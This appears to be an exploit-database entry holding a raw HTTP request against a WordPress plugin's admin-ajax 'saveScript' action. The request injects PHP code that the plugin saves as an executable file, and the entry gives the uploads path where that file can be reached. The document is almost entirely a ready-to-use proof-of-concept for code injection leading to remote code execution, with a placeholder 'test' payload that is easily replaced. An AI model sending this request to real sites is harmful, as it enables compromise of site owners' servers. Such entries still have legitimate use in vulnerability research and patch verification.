Share
## https://sploitus.com/exploit?id=WPEX-ID:F3B450D2-84CE-4C13-AD6A-B60785DEE7E7
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 295

action=saveScript&php_script=%22%3C%3Fphp+die('test')%3B%22&SCORG_enable_script=1&form_data=post_status%3Dpublish%26post_name%3Dtest%26post_author%3D1%26post_name%3Dtest%26post_ID%3D200%26post_title%3Dtest%26SCORG_enable_script%3D1%26SCORG_trigger_location%3Deverywhere%26SCORG_script_type%3Dphp


The file will be at https://example.com/wp-content/uploads/scripts-organizer/200.php